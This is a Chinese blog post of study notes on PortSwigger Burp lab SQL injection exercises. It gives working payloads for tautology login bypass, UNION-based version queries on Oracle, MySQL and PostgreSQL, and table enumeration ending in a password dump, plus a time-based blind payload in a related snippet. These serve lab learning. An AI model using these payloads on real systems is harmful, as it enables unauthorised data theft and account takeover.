Burp靶场sql注入学习笔记1

最新推荐文章于 2025-06-09 01:12:59 发布
原创 最新推荐文章于 2025-06-09 01:12:59 发布 · 912 阅读 · 19 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#sql #学习 #笔记

1.SQL injection vulnerability in WHERE clause allowing retrieval of hidden data

网页提示网站的sql语句是这样

找到注入点为url

根据给的查询语句构造payload

' and released=0--

完成题目需要找到未上架商品

或者使用payload也可以找到所有商品包括未上架的

' or 1=1--+ 

2.SQL injection vulnerability allowing login bypass

题目叫我们以管理员的身份登录应用程序

在页面右上角发现my account,点击后发现出现登录界面

密码输入单引号时发现报错,应该是有做过滤或者确实存在sql注入

尝试使用万能密码登录

登录成功

但是经过尝试后面的注释符用“#”就是不行,可能是这个数据库不支持#作为注释符或者是#因为某种限制或者过滤没有正确传输到sql语句中

3.SQL injection attack, querying the database type and version on Oracle

这题的数据库是Oracle

想要查找数据库的版本信息,可以使用union注入

首先判断回显列数,在order by 2时发现回显成功,3时失败,说明回显列数为2

Oracle数据库查看版本信息的语句是select banner from v$version

同时也要注意在对Oracle数据库注入中,union的占位通常使用NULL不使用数字,使用数字可能发生错误,因为其要求要和union前面查询的字段类型的类型一致,所以大多使用NULL

Oracle数据库有个特点,就是每个查询语句后面都要跟一个表,所以就出现了一个表叫做dual,这个表主要用于当我们执行函数或者做一些计算时不用查询某个表的情况下使用,这时候我们就可以from dual这个表来让我们的查询语句后面有个表跟着,这里的注入也需要利用这个表

那么我们可以构造payload为

a'union select null,banner from v$version--+

输入后成功拿下

4.SQL injection attack, querying the database type and version on MySQL and Microsoft

注入点一样,同样判断出回显列数为2

查询操作系统发行版的sql语句是select @@version;

那么我们就可以构造payload为

a'union select 1,@@version--+

5.SQL injection attack, listing the database contents on non-Oracle databases

本关要求我们得到一个保存用户名和密码的表并用管理员账号登录

在使用union注入时,数字1和2不起效果,应该不是sql数据库

使用语句 g‘union select ’null‘,banner from v$version--+报错,说明也不是Oracle数据库

使用语句g'union select 'null',version()--成功,说明是PostgreSQL数据库

相较于mysql的SQL注入

查数据库名

        select database等于select current_database()/current_catalog

查表名

        select table_name from information_schema.tables where table_schema='xxx'等于

        select relname from pg_stat_user_tables

查列名

和mysql数据库基本一样

select column_name from information_schema.columns where table_name='xxx'

查数据

也和mysql数据库基本一样

select 列 from 表

爆数据库名

使用payload

g'union select 'null',current_database()--+

爆表名

使用payload

a' union select 'null',relname from pg_stat_user_tables--+

爆列名

使用payload

a' union select 'null',column_name from information_schema.columns where table_name='users_zaxmws'--+

爆数据

使用payload

a' union select 'null',password_qtogxw from users_zaxmws--

在使用第二个密码zpig65lblzxvx8jddoi4时成功登录管理员账户

BurpSuit官方实验室之SQL注入
tpaer的博客
11-13 6497
BurpSuit官方实验室靶场-SQL注入通关记录。
burp 官方靶场 第二章 sql注入
2301_78362619的博客
02-01 1508
要在每个位置测试字符,您需要在您定义的有效负载位置发送合适的有效负载。或者,您可以创建一个具有两个有效载荷位置和“集束炸弹”攻击类型的单个入侵者攻击,并通过偏移量和字符值的所有排列进行工作。现在,您只需对密码中的其他每个字符位置重新运行攻击,以确定它们的值。为此,请返回到主Burp窗口和Burp Intruder的Positions选项卡,并将指定的偏移量从1更改为2。当条件不再为真时(即“欢迎回来”消息消失时),您已经确定了密码的长度,实际上是20个字符长。该行显示的有效载荷是第一个位置的字符的值。
Burpsuite靶场——SQL注入
小林说安全的博客
05-13 6081
Burpsuite靶场——SQL注入漏洞详解,带你了解并从根源上解决SQL注入问题。
(一)SQL注入实例
weixin_43047908的博客
04-09 2502
SQL injection UNION attack, determining the number of columns returned by the query GET /filter?category=Gifts HTTP/1.1 Host: ac691f351f548a1780ec009d00da0072.web-security-academy.net Connection: close Cache-Control: max-age=0 sec-ch-ua: "Google Chrome";v=
PortSwigger web实验室(BurpSuit官方靶场)之SQL注入
weixin_60677557的博客
07-05 3949
SQL注入SQLi)是一种Web安全漏洞,允许攻击者干扰应用程序对其数据库进行的查询。它通常允许攻击者查看他们通常无法检索的数据。这可能包括属于其他用户的数据,或者应用程序本身能够访问的任何其他数据。在许多情况下,攻击者可以修改或删除此数据,从而导致应用程序的内容或行为发生持久更改。在某些情况下,攻击者可以升级SQL注入攻击以危及底层服务器或其他后端基础架构,或执行拒绝服务攻击。
Burp靶场SQL注入学习笔记3
Tonight_Fantasy的博客
04-04 900
本关还是需要获得users表内的账户和密码,但是变成了盲注根据提示,这题的注入点在cookie而不是在url上修改cookie的值页面正常再次修改cookie页面也正常回显,但是登录信息没了那么我们就可以根据这个welcome back来判断SQL语句是否为真既然知道了我们的目标列就是users表里的password,那么就直接爆破吧先判断密码长度使用payload在小于20时没有回显welcome back那么密码长度应该就是20爆数据,配合burp里的intruder模块。
portswigger靶场学习笔记(一)sqli注入
weixin_52835927的博客
10-08 700
在本次靶场开始联系之前,已经学习sqli-labs,pikachu,DVWA三个靶场,在学习portswigger的时候,我准备从较为熟悉的sqli注入部分开始。
DVWA靶场系列(五)—— SQL InjectionSQL注入
qq_45612828的博客
07-14 2360
DVWA靶场系列(五)—— SQL InjectionSQL注入
Dvwa之SQL 注入全级别学习笔记
Mbys_Lettuce的博客
09-15 1192
SQL注入指web应用程序对用户输入数据的合法性没有判断,前端传入后端的参数是攻击者可控的,并且参数带入数据库查询,攻击者可以通过不同的条件产生不同的SQL语句,这是学习dvwa的sql注入的相关笔记。仅供学习。 ​
BurpSuite官方实验室】SQL联合注入
weixin_52137383的博客
03-23 5118
1.Determining the number of columns required in an SQL injection UNION attack To carry out an SQL injection UNION attack, you need to ensure that your attack meets these two requirements. This generally involves figuring out: How many columns are being r
Portswigger sql注入
arcuied
12-22 1373
这里靶场指出 不要随意的测试 or 1=1 在update 和 delete下可能会增删数据。在union的第二个参数可以注出来 可以分两次读username 和 password。不知道是oracle还是SqlServer还是postgresql的语法。administrator登录 使用的Oracle数据库。需求: administrator登录。需求:获取Oracle数据的数据库版本。还要注意的是Oracle数据库的特性。需求:administrator登录。需求:返回包含null的值。
Lab3_ SQL injection attack, querying the database type and version on Oracle
weixin_53797419的博客
02-06 565
本文为burpsuit官方实验室sql注入系列第三关,查询oracle数据库的类型和版本
BurpSuite学院靶场系列(一)| SQL注入
最新发布
qq_45203884的博客
06-09 1331
摘要:本文记录了使用Yakit工具通关BurpSuite靶场的实战过程,涵盖多种SQL注入技术。从基础的WHERE子句注入(如'or 1=1')、登录绕过(administrator'--),到UNION攻击确定列数、查询数据库版本,再到盲注获取管理员密码(通过布尔盲注判断密码长度和字符)。针对不同数据库(Oracle/MySQL/PostgreSQL)展示了特定查询方法,如Oracle使用all_tables视图。文章通过具体SQL语句和Yakit截图,系统演示了Web安全中的SQL注入攻击技术链。
burp靶场sql注入通关—上
Zqinglele的博客
04-30 1802
'+union+select+'abc','def'+from+dual-- 没有报错说明两列都是字符型。1.这关要确定该表的名称及其包含的列,然后检索表的内容以获取所有用户的用户名和密码,并以管理员用户身份登录。'+union+select+'abc','def'-- 不报错,说明有两列。'+union+select+'abc','def'%23 不报错。'+union+select+'abc','def','ghi'%23 报错。
Burp靶场sql注入漏洞
xy_wjyjw的博客
11-23 1257
您可以使用一组针对应用程序中每个入口点的系统测试来手动检测 SQL 注入。OR 1=1OR 1=2或者可以使用 Burp Scanner 快速可靠地找到大多数 SQL 注入漏洞。
bp靶场---SQL注入第三关(oracle
m0_72471814的博客
01-08 1066
传送门。
burpsuit 靶场(SQL injection)
wanan的博客
01-23 522
burpsuit 靶场(SQL injection)
burpsuite安全练兵场-服务端1SQL注入-17个实验(全)
wangluoanquan111的博客
01-26 1752
blog.csdnimg.cn/3e1c80dc452343c9b3e29c5030fa90b1.png)博主:网络安全领域狂热爱好者(承诺在优快云永久无偿分享文章)。!blog.csdnimg.cn/3e1c80dc452343c9b3e29c5030fa90b1.png)殊荣:优快云网络安全领域优质创作者,2022年双十一业务安全保卫战-某厂第一名,某厂特邀数字业务安全研究员,edusrc高白帽,vulfocus、攻防世界等平台排名100+、高校漏洞证书、cnvd原创漏洞证书等。!
pikachu靶场sql注入盲注burp
03-23
### Pikachu靶场 SQL注入盲注与Burp Suite使用教程 #### 一、SQL注入盲注概述 SQL盲注是一种通过观察程序返回的结果来推测数据库结构和内容的技术。它通常分为两种类型:基于布尔的盲注和基于时间的盲注[^4]。 - **基于布尔的盲注**:攻击者发送不同的请求并根据页面响应的不同来推断出数据库中的信息。 - **基于时间的盲注**:攻击者利用 `SLEEP()` 或其他延迟函数让数据库等待一段时间再返回结果,以此判断条件是否成立。 #### 二、环境准备 为了安全地学习和实践SQL注入技术,可以搭建Pikachu靶场作为实验平台。以下是所需工具: 1. **Pikachu靶场**:提供多种Web漏洞供测试[^1]。 2. **Burp Suite**:用于拦截HTTP/HTTPS流量,修改参数以实现注入尝试[^2]。 #### 三、操作流程 ##### 1. 基于布尔的盲注实例 假设目标URL为`http://localhost/pikachu/vul/sqli_blind.php?id=1`,可以通过调整ID值逐步猜测数据库版本号或其他敏感信息。 例如,在浏览器地址栏输入以下payloads之一,并注意页面变化: ```plaintext http://localhost/pikachu/vul/sqli_blind.php?id=if(ascii(substr(version(),1,1))>50,sleep(5),null) ``` 如果页面加载超过五秒,则说明当前字符大于ASCII码50;反之则小于等于50。继续缩小范围直至找到确切数值为止[^3]。 ##### 2. 利用Burp Suite辅助分析 启动Burp Proxy并将浏览器代理设置指向本地监听端口8080之后访问上述链接。此时可以在Intercept标签页看到完整的GET请求详情: ```plaintext GET /pikachu/vul/sqli_blind.php?id=1 HTTP/1.1 Host: localhost ... ``` 手动编辑此包内的"id"字段替换为我们设计好的payload后再转发给服务器验证效果如何。这种方法特别适用于POST方法提交表单场景下难以直接篡改url的情况。 #### 四、注意事项 尽管在受控环境中研究这些技术有助于理解网络安全原理,但在未经授权的情况下对真实网站实施此类行为属于违法行为,请务必遵守法律法规! --- ###
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值